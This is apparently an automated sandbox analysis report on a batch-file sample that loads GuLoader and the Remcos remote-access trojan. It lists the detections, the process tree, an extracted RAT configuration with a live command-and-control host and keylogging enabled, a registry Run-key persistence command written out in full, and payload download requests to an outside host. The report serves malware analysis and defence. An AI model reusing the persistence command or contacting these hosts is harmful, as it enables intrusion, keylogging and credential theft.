Windows Analysis Report
ZW_PCCE-010023024001.bat

Overview

General Information

Sample name: ZW_PCCE-010023024001.bat
Analysis ID: 1540333
MD5: 38b51fe8789aee6c37ac4fa092eefa0f
SHA1: 8b5003d1917a07cd8f66cea66ad0add47130fc5b
SHA256: 36a9a24404963678edab15248ca95a4065bdc6a84e32fcb7a2387c3198641374
Tags: bat, user-abuse_ch

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7252 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7344 cmdline: powershell.exe -windowstyle hidden "[obfuscated PowerShell script]" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7580 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script]" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7800 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7940 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 2960 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1280 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2800 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • wscript.exe (PID: 7560 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

{"Host:Port:Password": ["rj0987654321.duckdns.org:53848:1"], "Assigned name": "r", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I42HQ2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7344.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_7580.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
                • 0xc38a:$b2: ::FromBase64String(
                • 0xb407:$s1: -join
                • 0x4bb3:$s4: +=
                • 0x4c75:$s4: +=
                • 0x8e9c:$s4: +=
                • 0xafb9:$s4: +=
                • 0xb2a3:$s4: +=
                • 0xb3e9:$s4: +=
                • 0x15745:$s4: +=
                • 0x157c5:$s4: +=
                • 0x1588b:$s4: +=
                • 0x1590b:$s4: +=
                • 0x15ae1:$s4: +=
                • 0x15b65:$s4: +=
                • 0xbc23:$e4: Get-WmiObject
                • 0xbe12:$e4: Get-Process
                • 0xbe6a:$e4: Start-Process
                • 0x163c9:$e4: Get-Process

                System Summary

                Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , ProcessId: 7560, ProcessName: wscript.exe
                Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , ProcessId: 7560, ProcessName: wscript.exe
                Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , ProcessId: 7560, ProcessName: wscript.exe
                Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7940, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
                Source: Process started, Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7896, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", ProcessId: 7940, ProcessName: reg.exe
                Source: Network Connection, Author: frack113: Data: DestinationIp: 81.180.144.124, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7800, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49925
                Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", ProcessId: 7896, ProcessName: cmd.exe
                Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , ProcessId: 7560, ProcessName: wscript.exe
                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "[obfuscated PowerShell script, truncated in the report]

                Stealing of Sensitive Information

                Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7800, TargetFilename: C:\ProgramData\remcos\logs.dat
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-23T17:23:27.606844+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49974 | 193.187.91.212 | 53848 | TCP
                2024-10-23T17:23:29.809919+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49976 | 193.187.91.212 | 53848 | TCP
                2024-10-23T17:24:48.653044+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49978 | 193.187.91.212 | 53848 | TCP
                2024-10-23T17:24:48.755150+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49979 | 193.187.91.212 | 53848 | TCP
                2024-10-23T17:24:57.763118+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49980 | 193.187.91.212 | 53848 | TCP
                2024-10-23T17:23:29.437091+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.9 | 49977 | 178.237.33.50 | 80 | TCP
                2024-10-23T17:23:14.952726+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49925 | 81.180.144.124 | 443 | TCP


                AV Detection

                Source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": ["rj0987654321.duckdns.org:53848:1"], "Assigned name": "r", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I42HQ2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
                Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
                Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.2% probability
                Source: unknown, HTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49737 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49925 version: TLS 1.2
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*j[P source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.1669372747.0000000007535000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*tK source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\<.oeaccount source: msiexec.exe, 00000010.00000002.1958810388.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW
                Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
                Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user

                Networking

                Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection: 192.168.2.9:49976 -> 193.187.91.212:53848
                Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection: 192.168.2.9:49978 -> 193.187.91.212:53848
                Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection: 192.168.2.9:49974 -> 193.187.91.212:53848
                Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection: 192.168.2.9:49979 -> 193.187.91.212:53848
                Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection: 192.168.2.9:49980 -> 193.187.91.212:53848
                Source: Malware configuration extractor, URLs: rj0987654321.duckdns.org
                Source: unknown, DNS query: name: rj0987654321.duckdns.org
                Source: global traffic, TCP traffic: 192.168.2.9:49974 -> 193.187.91.212:53848
                Source: global traffic, HTTP traffic detected:
                    GET /json.gp HTTP/1.1
                    Host: geoplugin.net
                    Cache-Control: no-cache
                Source: Joe Sandbox View, IP Address: 178.237.33.50
                Source: Joe Sandbox View, ASN Name: OBE-EUROPEObenetworkEuropeSE
                Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network traffic, Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa: 192.168.2.9:49977 -> 178.237.33.50:80
                Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa: 192.168.2.9:49925 -> 81.180.144.124:443
                Source: global traffic, HTTP traffic detected:
                    GET /Nonaddicting.qxd HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                    Host: ethys.ro
                    Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected:
                    GET /3/tVWTkim99.bin HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                    Host: ethys.ro
                    Cache-Control: no-cache
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic, DNS traffic detected: DNS query: ethys.ro
                Source: global traffic, DNS traffic detected: DNS query: rj0987654321.duckdns.org
                Source: global traffic, DNS traffic detected: DNS query: geoplugin.net
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
                Source: msiexec.exe, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv6BC6.tmp.15.drString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownHTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49925 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041183A OpenClipboard,GetLastError,15_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
